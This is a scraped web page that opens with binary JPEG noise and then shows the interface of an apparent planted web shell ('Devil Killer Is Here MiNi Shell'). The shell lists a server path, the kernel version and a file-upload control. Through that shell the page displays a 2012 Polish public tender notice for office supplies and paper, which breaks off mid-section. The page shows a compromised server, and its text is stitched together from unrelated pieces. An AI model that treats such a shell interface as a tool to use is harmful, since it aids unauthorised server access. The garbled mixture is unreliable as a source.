JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/125599-N-2012.html

<p class="kh_header"><b>Warszawa: Sukcesywna dostawa materiałów biurowych, papieru ksero i papieru toaletowego</b><br>
<b>Numer ogłoszenia: 125599 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Ekonomiki Rolnictwa i Gospodarki Żywnościowej Państwowy Instytut Badawczy , ul. Świętokrzyska 20, 00-002 Warszawa, woj. mazowieckie, tel. 022 50 54 444, faks 022 8271960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ierigz.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowy instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych, papieru ksero i papieru toaletowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> lp.	przedmiot zamówienia	j. m.	ilość szacunkowa 
1blok biurowy A-4, kratka, około 100 kartek z mikroperforacją ułatwiającą wyrywanie kartek	szt.	50
2blok biurowy A-5, kratka, około 100 kartek z mikroperforacją ułatwiającą wyrywanie kartek	szt.	50
3brulion A-4  kratka, około 100 kartek, gramatura min. 70 g, szyty, twarda lakierowana oprawa	szt.	50
4brulion A-4 kratka, około 190 kartek, gramatura min. 70 g, szyty, twarda lakierowana oprawa	szt.	10
5brulion A-5 kratka, około 100 kartek, gramatura min. 70 g, szyty, twarda lakierowana oprawa	szt.	100
6bloczek karteczek samoprzylepnych do notowania, nim. 100 kartek różne kolory, rozmiary: 	 	 
 38x51	szt.	200
76x127	szt.	150
76x76	szt.	500
	51x76	szt.	150
7blok do flipchartu do zawieszania na tablicy typu flipchart, gładki o gramaturze 70 g/m2, min  20 arkuszy	szt.	30
8cienkopis z końcówką fibrową oprawioną w metal z tuszem odpornym na wysychanie, grubość linii 03 do 0,5 mm, kolor skuwki lub inny fragment obudowy wskazuje jednocześnie kolor tuszu, typu Point 88, różne kolory	szt.	200
9długopis (nie żelowy) w trwałej, przezroczystej obudowie z gumowym uchwytem, skuwką z klipsem, zakończeniem w kolorze tuszu i wkładem wymiennym o średniej końcówce, typu Rystor, Pilot, różne kolory 	szt.	550
10długopis (nie żelowy) automatyczny w trwałej, przezroczystej obudowie z gumowym uchwytem,  z klipsem, zakończeniem w kolorze tuszu i wkładem wymiennym o średniej końcówce, (system przyciskowy nie zintegrowany z klipsem), typu Rystor, Pilot, różne kolory 	szt.	250
11dziurkacz wykonany z wytrzymałego  metalu z plastikowymi elementami, wskaźnikiem formatu i możliwością dziurkowania do 30 kartek, typu Sax	szt.	15
12dziurkacz mocny z systemem redukcji siły potrzebnej do uruchomienia, ergonomiczną rączką i automatycznym systemem centrowania papieru do jednorazowego dziurkowania min. 100 kartek, typu Rapid	szt.	5
13dziurkacz na cztery otwory z możliwością dziurkowania do min 30 kartek, z metalowym mechanizmem i metalowa obudową, posiadający ogranicznik formatu szt.	2
14dziennik podawczy (korespondencyjny) A-4, około 100 kartek, szyty, twarda oprawa	szt.	7
15etykiety adresowe samoprzylepne, op. 100 arkuszy,  różne rozmiary	op.30
16etykiety na CD, op. 25 arkuszy	op.	5
17flamaster z bezwonnym tuszem na bazie wody, cienko piszący, typu Stabilo, różne kolory 	szt.	150
18folia A -4 do bindowania  przezroczysta, wykonana z PCV, grubość 0,20 mm, op.100 szt.	op. 	10
19folia do faksu KX FP 207 	op.	2
20folia do faksu KX FP 343	op.	2
21foliopis niezmywalny, odporny na działanie światła przeznaczony do pisania po różnych powierzchniach , o średniej grubość linii pisania typu Stabilo, różne kolory szt.	30
22grafity do ołówka o linii pisania  0,5 mm, różne twardości, op. 12 szt.	op.15
23grafity do ołówka o linii pisania  0,7 mm, różne twardości, op. 12 szt.	op.15
24gąbka magnetyczna do ścierania  tablic suchościeralnych	szt.	5
25gumka recepturka wykonana z materiału o zwiększonej domieszce kauczuku, wytrzymała i elastyczna o średnicy ok. 60 mm, op. ok. 15 g	op.	5
26gumka miękka, nie brudząca, nie naruszająca struktury papieru, przeznaczona do wymazywania ołówka, atramentu, tuszu o wymiarach min. 35x16x12mm, typu Staedler	szt.	50
27koperta C-6, biała,  samoklejąca op. 50 szt.	op.	100
28koperta DL, biała, samoklejąca  op. 50 szt.	op.	10
29koperta B-5 biała, samoklejąca  z paskiem op. 50 szt. 	op.	150
30koperta B-4 biała, samoklejąca  z paskiem  op. 50 szt.	op.	90
31koperta C-5 biała, samoklejąca  z paskiem  op. 50 szt.	op.	20
32koperta C-4 biała, samoklejąca z paskiem  op. 50 szt.	op.	20
33koperta z rozszerzanymi  bokami i spodem B-4, brązowa, samoklejąca z paskiem  op. 25 szt. op.20
34koperta z rozszerzanymi  bokami i spodem B-5, brązowa, samoklejąca z paskiem  op. 25 szt.op.20
35koperta z folią bąbelkową, samoklejąca z paskiem o rozmiarze zewnętrznym  240mmx275mm	szt.	300
36koperta z folią bąbelkową, samoklejąca z paskiem o rozmiarze zewnętrznym  250mmx350mm	szt.	500
37koperta z folią bąbelkową, samoklejąca z paskiem o rozmiarze zewnętrznym  290mmx370mm	szt.	1500
38koperta z folią bąbelkową , samoklejąca z paskiem na CD	szt.	300
39koperta z okienkiem na płyty   CD/DVD   op. 50 szt.	op.	5
40koszulka na dokumenty A-4  maxi, groszkowa, otwierana od góry, ze wzmocnionym brzegiem umożliwiającym wpięcie do segregatora  op. 25 szt.	op.	150
41koszulka na dokumenty A-4 groszkowa otwierana od góry, ze wzmocnionym brzegiem umożliwiającym wpięcie do segregatora, op. 100 szt.	op.	50
42koszulka na dokumenty A-4, wykonana z folii o grubości min. 50 mikronów, wysokoprzezroczysta (krystaliczna), ze wzmocnionym brzegiem umożliwiającym wpięcie do segregatora, op. 100 szt.	op.	35
43koszulka na dokumenty A-4 groszkowa z klapką otwieraną z boku, ze wzmocnionym brzegiem umożliwiającym wpięcie do segregatora, op. 10 szt.	op.220
44koszulka na dokumenty A-4 z klapką boczną otwieraną na rzep, op. 3 szt.	op.50
45koszulka na dokumenty A-4 z bocznym mocnym zapięciem na suwak, wykonana z mocnej antystatycznej folii, op. 10 szt.	op.	5
46koszulka na dokumenty A-5 z bocznym mocnym zapięciem na suwak, wykonana z mocnej antystatycznej folii, op. 5 szt.	op.	5
47koszulka (kieszeń)  samoprzylepna z klapką na płyty CD/DVD wykonana z antystatycznej folii z możliwością przyklejenia w dowolnym miejscu, pokryta klejem umożliwiającym wielokrotne otwieranie i zamykanie,  op. 10 szt.	op.	20
48koszulka (kieszeń) z klapką  na 1płytę CD/DVD wykonana z antystatycznej folii z możliwością wpięcia do segregatora, op. 10 szt.	op.	10
49koszulka  (kieszeń) z  na 2 płyty CD/DVD wykonana z antystatycznej folii z możliwością wpięcia do segregatora  op. 5 szt.	op.	10
50klej w płynie do papieru i tektury z aplikatorem (rolką) dozującym wypływ kleju, bezbarwny, bezwonny, zmywalny, nie brudzący, nie powodujący fałdowania papieru o pojemności min. 30 ml, typu Pritt	szt.	50
51klej w sztyfcie do papieru i tektury, bezbarwny, bezwonny, zmywalny, nie brudzący i nie powodujący fałdowania papieru o gramaturze min. 15 g., typu Pritt, Donau	szt.	250
52	klej w taśmie szerokość min 8.4mm, długość taśmy min 8.5m, nie zawierający rozpuszczalników, do klejenia papieru, szkła , materiałów syntetycznych, typu Pritt	szt.	15
53	korektor w płynie z  pędzelkiem dobrze kryjący, szybkoschnący, bezzapachowy na bazie wody o pojemności min. 20 ml, typu Donau	szt.	90
54	korektor w długopisie z metalową zaworkową końcówką zamiast kulki do precyzyjnego, punktowego korygowania, szybkoschnący o doskonałych właściwościach kryjących, odporny na zasychanie i zalewanie, pojemność min. 4,2 ml, typu Pentel 	szt.	100
55	korektor  w taśmie 4,2 mm z wymienna kasetą, długość taśmy min. 14 m, typu Pritt 	szt.	30
56	kołonotatnik A-4 w twardej oprawie, min.160 kartek w kratkę mocowanych w spirali z mikroperforacją ułatwiającą wyrywanie kartek i możliwością wpięcia do segregatora 	szt.	50
57	kołonotatnik A-5 w twardej oprawie, min. 80 kartek w kratkę mocowanych w spirali z mikroperforacją ułatwiającą wyrywanie kartek i możliwością wpięcia do segregatora 	szt.	50
58	linijka wykonana z przezroczystego propylenu o wysokiej giętkości, długość:	 	 
 	20 cm	szt.	15
	30 cm	szt.	15
	50 cm	szt.	10
59	linijka wykonana z aluminium z wkładką antypoślizgową pod spodem, długość: 	 	 
 	30 cm	szt.	10
	 50 cm	szt.	10
60	marker permanentny nietoksyczny, przeznaczony do pisania po różnych powierzchniach, szybkoschnący, odporny na wodę o neutralnym zapachu z okrągłą końcówką o średniej grubości linii pisania, skuwka lub zakończenie w kolorze tuszu, typu Pentel, różne kolory  	szt.	100
61	marker do tablic suchościeralnych wypełniony nie wysychającym tuszem na bazie alkoholu, łatwym do starcia z tablicy, okrągła końcówka, skuwka lub zakończenie w kolorze tuszu typu Pentel,  różne kolory  	szt.	150
62	marker do opisywania płyt CD/DVD wodoodporny, niezmywalny o neutralnym zapachu i cienkiej końcówce, typu Pilot, Pentel, różne kolory 	szt.	150
63	marker do arkuszy prezentacyjnych  z okrągłą końcówką o średniej grubości linni8 pisania i tuszem nie przebijającym przez papier o neutralnym zapachu, typu Pentel, różne kolory  	szt.	150
64	nożyczki całe metalowe z nierdzewnej stali, długość ok.	 	 
 	17 cm 	szt.	20
	20 cm	szt.	25
65	nóż do otwierania kopert o długości 19-22,5 cm z nierdzewnym metalowym ostrzem i rękojeścią pokrytą sztucznym tworzywem	szt.	10
66	ofertówka na dokumenty A-4 z twardej, krystalicznej, przezroczystej folii PCV, zgrzana na lewym boku i dolnej krawędzi,  op. 25 szt.	op.	60
67	ołówek automatyczny wykonany z plastiku z gumowym uchwytem, klipsem i gumką pod przyciskiem, grubość grafitu:	 	 
 	0,5  mm	szt.	50
	0,7 mm	szt.	50
68	ołówek w drewnianej lakierowanej obudowie, bez gumki, grafit odporny na złamania, op. 12 szt., twardość HB	op	15
69	ołówek w drewnianej lakierowanej obudowie, z gumką, grafit odporny na złamania, op. 12 szt., trzy rodzaje twardości	op.	15
70	pióro żelowe automatyczne, chowany wkład, wodoodporny, pigmentowy tusz, gumowy uchwyt w kolorze tuszu, zabezpieczenie przed plamieniem ubrania, wymienny wkład o średniej  grubości linii pisania, (system przyciskowy nie zintegrowany z klipsem), typu Pilot, Pentel, różne kolory 	szt.	300
71	pióro żelowe w trwałej przezroczystej obudowie z gumowym uchwytem, skuwką z klipsem, zakończeniem w kolorze tuszu i wkładem wymiennym o średnie grubości linii pisania, typu Pilot, Pentel, różne kolory  	szt.	250
72	pióro kulkowe ze skuwką, pigmentowymmm, wodoodpornym tuszem, który nie rozmazuje się i nie znika pod wpływem światła, posiadający okienko umożliwiające kontrolę ilości tuszu, typu Uni UB-150, różne kolory	szt.	100
73	pojemnik składany do przechowywania dokumentów  z  PCV z wymienną etykietą na grzbiecie, różne kolory, szerokość grzbietu: 	 	 
 	7 cm	szt.	20
	11 cm	szt.	20
74	przybornik na biurko prostokątny wykonany z polistyrenu w kolorze dymnym, wielofunkcyjny z bloczkiem papierowym, min 6 przegródek	szt.	10
75	pojemnik na długopisy (kubek) wykonany z odpornego na pękanie polistyrenu, dwukomorowy o szerokości min 70mm i wysokości 90 mm	szt.	15
76	pojemnik na spinacze z magnesem umieszczonym w plastikowej pokrywie	szt.	15
77	przekładka do segregatora A-4  z numeracją 1-12, wykonane z białego mocnego kartonu i indeksami wzmocnionymi filią, multiperforowane	kpl	10
78	przekładka do segregatora A-4 alfabetyczne A-Z, wykonane z białego mocnego kartonu i indeksami wzmocnionymi filią, multiperforowane	kpl	10
79	pinezki kolorowe (beczułki) do tablic korkowych op. 25 szt., mix kolorów	op.	30
80	podajnik do taśmy klejącej  o wymiarach 19x33mm, z obciążoną podstawką, wykonany z trwałego i odpornego plastiku, posiadający metalowy nożyk  zapewniający łatwe ucinanie taśmy	szt.	20
81	półka na dokumenty A-4, wykonana z wysokiej jakości plastiku z możliwością pionowego łączenia, z przodu półki miejsce do zamocowania etykiety, kolor dymny	szt.	30
82	płyn do czyszczenia i usuwania trudnych zabrudzeń z tablic suchościeralmych	szt.	5
83	rozszywacz do wszystkich typów zszywek z mechanizmem blokującym 	szt.	30
84	skoroszyt do segregatora A-4 wykonany z mocnego, sztywnego PCV, perforowany, wpinany do każdego rodzaju segregatora, przednia okładka przezroczysta, tylna kolorowa, z papierowym wymiennym paskiem do opisywania  op.10 szt., różne kolory	op.	40
85	skoroszyt do segregatora A-4 wykonany z mocnego, sztywnego PCV, przednia okładka przezroczysta, tylna kolorowa, z papierowym wymiennym paskiem do opisywania  op.10 szt., różne kolory	op.	20
86	skoroszyt A-4 pełny wykonany z kartonu o gramaturze 350g/m2 z metalowym wąsem, posiadający zawieszkę umożliwiającą wpięcie do segregatora	szt.	50
87	skoroszyt A-4 pełny wykonany z kartonu o gramaturze 350g/m2 z metalowym wąsem 	szt.	50
88	skoroszyt A-4 z klipsem zaciskowym wykonany z folii, tylna okładka kolorowa, przednia przezroczysta, różne kolory, rozmiar do: 	 	 
 	30 kartek	szt.	20
	60 kartek	szt.	20
89	segregator A-4 z dźwignią i dociskiem, dolne krawędzie wzmocnione metalowymi okuciami, oklejony dwustronnie kolorowym tworzywem, wymienna etykieta na grzbiecie, różne kolory, szerokość grzbietu min:  	 	 
 	50 mm	szt.	300
	75 mm	szt.	550
90	skorowidz A-4 szyty, twarda oprawa, około 100kartek w kratkę z indeksem alfabetycznym	szt.	5
91	skorowidz A-5 szyty, twarda oprawa, około 100kartek w kratkę z indeksem alfabetycznym	szt.	5
92	spinacz biurowy, srebrny 28 mm, okrągły, op. 100 szt.	op.	200
93	spinacz plikowy, srebrny 50 mm, okrągły, op. 100 szt.	op.	50
94	spinacze-klipy do papieru, metalowe, zapewniające doskonałą sprężystość, op. 12 szt., rozmiar:	 	 
 	19 mm	op.	150
	25 mm 	op.	150
	32 mm 	op.	150
	41 mm 	op.	100
	51 mm 	op.	100
95	taśma klejąca: rozmiar:	 	 
 	18mmx20m	szt.	80
	24mmx20m	szt.	30
96	taśma dwustronnie klejąca 50mmx10m	szt.	10
97	taśma do paczek min 45mmx 50m	 	 
 	brązowa	szt.	50
	przezroczysta	szt.	50
98	taśma klejąca min. 19mmx7m, na podajniku, niewidoczna po naklejeniu na papierze i kserokopiach po której można pisać, nie żółknie z czasem i nie odkleja się 	szt.	15
99	taśma klejąca niewidoczna po naklejeniu na papierze i kserokopiach po której można pisać, nie żółknie z czasem i nie odkleja się 19mmx33mmm	szt.	10
100	tablica korkowa w ramie drewnianej, mocowana do ściany z możliwością zawieszenia w pionie i w poziomie, rozmiar:	 	 
 	90cmx60cm	szt.	3
	120cmx90cm	szt.	3
	50cmx60cm	szt.	3
101	teczka na dokumenty A-4 wiązana bawełnianymi tasiemkami, wykonana z białego kartonu o gramaturze min 350g/m2, z nadrukiem na stronie tytułowej, szerokość grzbietu min., 25 mm, na grzbiecie i trzech wewnętrznych klapkach widoczne bigi ułatwiające zwiększenie pojemności op. 50 szt. 	op.	50
102	teczka A-4 z gumką na narożnikach w kolorze teczki, karton dwustronnie barwiony(preszpanowy), trzy skrzydłowa, typu Donau  op. 10 szt.	op.	150
103	teczka A-4 do podpisu na min. 10 wkładów, okładka z twardego kartonu pokryta folią PP, grzbiet harmonijka, karty z otworkami	szt.	5
104	teczka A-4 trzy skrzydłowa, wykonana z twardej, sztywnej tektury, powlekana  na zewnątrz folią polipropylenową, zamykana na dwa  na rzepy, szerokość grzbietu min. 40 mm	szt.	50
105	teczka A-4  kopertowa, wykonana z twardej sztywnej tektury dwustronnie barwiona, zamykana na rzep, typu Donau	szt.	50
106	teczka z  plastikową rączką i zapięciem, wykonana z wytrzymałej tektury, oklejona na zewnątrz folią PP, szerokość grzbietu min. 40 mm	szt.	40
107	teczka A-4 segregująca z sześcioma  przekładkami, zamykana, z etykietą do opisu, wykonana z polipropylenu,   	szt.	80
108	temperówka metalowa pojedyncza ze stalowym ostrzem mocowanym wkrętem	szt.	20
109	tusz do pieczątek samotuszujących z końcówką ułatwiającą nasączanie, pojemność min. 25 ml, różne kolory	szt.	10
110	wkład do korektora zaproponowanego w pozycji 55 	szt.	30
111	wizytownik wpięty w czteroringowy mechanizm zaciskowy na min. 200 wizytówek z możliwością wpięcia dodatkowych koszulek	szt.	10
112	wizytownik obrotowy, zamykany, posiadający min. 200 przezroczystych, dwustronnych koszulek na wizytówki, zawierający przekładki alfabetyczne od A-Z, na stabilnej, metalowej konstrukcji, typu Rolodex	szt.	5
113	zakreślacz fluoryscencyjny do wszystkich rodzajów papieru z nieblaknącym i nietoksycznym tuszem ze ściętą końcówką, szerokość linii pisania 2-5 mm, typu Stabillo, Donau, różne kolory	szt.	220
114	zakreślacz fluoryscencyjny do wszystkich rodzajów papieru, dwiema końcówkami grubszą ściętą i cienką okrągłą, różne kolory 	szt.	80
115	zakreślacz dwukolorowy z płynnym tuszem na bazie wody ze ściętą końcówką, typu Pilot , różne kolory	szt.	30
116	zakładki indeksowe papierowe, samoprzylepne po których można pisać, w czterech kolorach, min. 50 szt. w każdym kolorze 	kpl	230
117	zakładki indeksowe przezroczyste, samoprzylepne w pięciu kolorach, min. 25 szt. w każdym kolorze	kpl	200
118	zszywacz do 30 kartek, metalowa podstawa, ramie z niełamliwego plastiku o dużej wytrzymałości, ładowany od góry	szt.	40
119	zszywacz ciężki, metalowy o dużej wytrzymałości z ogranicznikiem głębokości zszywania do 100 kartek na zszywki 23/6, 23/8, 23/10	szt.	5
120	zszywacz z długim ramieniem, metalowy z ograniczeniem głębokości zszywania do min 30 kartek	szt.	5
121	zszywki 24/6 op. 1000 szt.	op.	250
122	zszywki 23/6 op. 1000 szt.	op.	80
123	zszywki 23/8 op. 1000 szt.	op.	55
124	zszywki 23/10 op. 1000 szt.	op.	70
125	zeszyt A-5  w miękkiej oprawie w kratkę, 32 kartkowy	szt.	20
126	zeszyt w miękkiej oprawie w kratkę, 60 kartkowy	szt.	20
127	zeszyt w miękkiej oprawie w kratkę, 80 kartkowy	szt.	20
128	zszywki do zszywacza Rapid 66/6 op. 5000 szt.	op.	30
129	zszywki do zszywacza Rapid 66/8+ op. 5000 szt.	op.	30
130	zszywki do zszywacza Rapid 24/8+ op. 5000 szt.	op.	5
131	papier kserograficzny biały, format  A-4,  przeznaczony do kopiarek, drukarek laserowych i atramentowych do wydruków czarno-białych i kolorowych, gramatura 80 g/m2, minimalne parametry: białość 160 CIE, nieprzezroczystość 90%, wilgotność 3,8-5%,  ryza 500 ark.	ryza	1500
132	papier kserograficzny biały, format  A-3,  przeznaczony do kopiarek, drukarek laserowych i atramentowych do wydruków czarno-białych i kolorowych, gramatura 80 g/m2, minimalne parametry: białość 160 CIE, nieprzezroczystość 90%, wilgotność 3,8-5%,  ryza 500 ark.	ryza	20
133	papier kserograficzny  kolorowy, format  A-4, gramatura 80g/m2, ryza 500 ark., kolor do wyboru	ryza	5
134	papier toaletowy celulozowy, dwuwarstwowy, miękki, nierozdwajający się , bezzapachowy, perforowany w kolorze białym, tradycyjne rolki typu Velvet	rolka	42000
135	czyściwo celulozowe, dwuwarstwowe, nierozdwajające, perforowane, białe, rozmiar szerokość 260mm, długość 280mm, średnica 260 mm (rolka pasująca do stojaka ścienno-podłogowego na czyściwo Katrin Wall-Stand) op. 2 rolki)	rolka	26


3.2.	Wykonawca będzie dostarczał towar sukcesywnie, w zależności od potrzeb Zamawiającego na podstawie zamówień częściowych składanych na piśmie, faksem lub mailem przez uprawnionego pracownika Zamawiającego. Przewiduje się, że dostawy częściowe będą realizowane raz w miesiącu.

3.3.	Wykonawca zobowiązany jest realizować dostawy częściowe w terminie 7 dni od daty otrzymania zamówienia częściowego. Asortyment ujęty w zamówieniu częściowym winien być w całości dostarczony w ramach jednej dostawy.

3.4.	Wykonawca będzie dostarczał materiały biurowe i papier będące przedmiotem zamówienia na własny koszt i ryzyko wraz z wniesieniem we wskazane miejsce w siedzibie Zamawiającego.

3.5.	Zamawiający zastrzega sobie prawo zwiększenia lub zmniejszenia przewidywanej ilości zamawianych materiałów biurowych i papieru w poszczególnych asortymentach, w ramach wynagrodzenia umownego. 

3.6.	Zakres zamówienia może być pomniejszony o 25% ogólnej wartości zamówienia .

3.7.	Zakup przez Zamawiającego mniejszej ilości materiałów biurowych i papieru niż wymienione w SIWZ nie może być podstawą żadnych roszczeń ze strony Wykonawcy wobec Zamawiającego.

3.8.	Nazwy własne niektórych materiałów biurowych zostały użyte w Formularzu cenowym ze względu na specyfikę tych artykułów, ponieważ Zamawiający nie mógł opisać ich za pomocą dokładnych określeń. Zamawiający dopuszcza produkty równoważne przy zachowaniu parametrów technicznych i jakościowych produktów określonych w pkt 3.1. Za produkt równoważny Zamawiający uzna tylko taki, który ma tożsame ze wskazanym cechy techniczne i jakościowe. W przypadku wątpliwości Zamawiającego, obowiązek wykazania równoważności spoczywa na Wykonawcy.
3.9.	Nie dopuszcza się produktów nie opatrzonych znakiem towarowym (logo) producenta. W przypadku folii do bindowania, kopert, koszulek, teczek i skoroszytów dopuszcza się logo na opakowaniu zbiorczym (np. koszulka na dokumenty A-4 groszkowa z klapką otwieraną z boku, ze wzmocnionym brzegiem umożliwiającym wpięcie do segregatora, op. 10 szt.).

3.10.	Zamawiający wymaga podania w załączniku nr 5 do SIWZ - Formularzu cenowym nazwy producenta - marki oferowanego przedmiotu zamówienia dla każdej pozycji asortymentowej. 

3.11.	Na oferowane materiały biurowe Wykonawca udzieli 12 miesięcznej gwarancji licząc od  daty dostawy do siedziby Zamawiającego.

3.12.	Wykonawca dostarczy wzory oferowanych materiałów biurowych zgodnie z pkt 7.1.5. SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 33.76.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że:
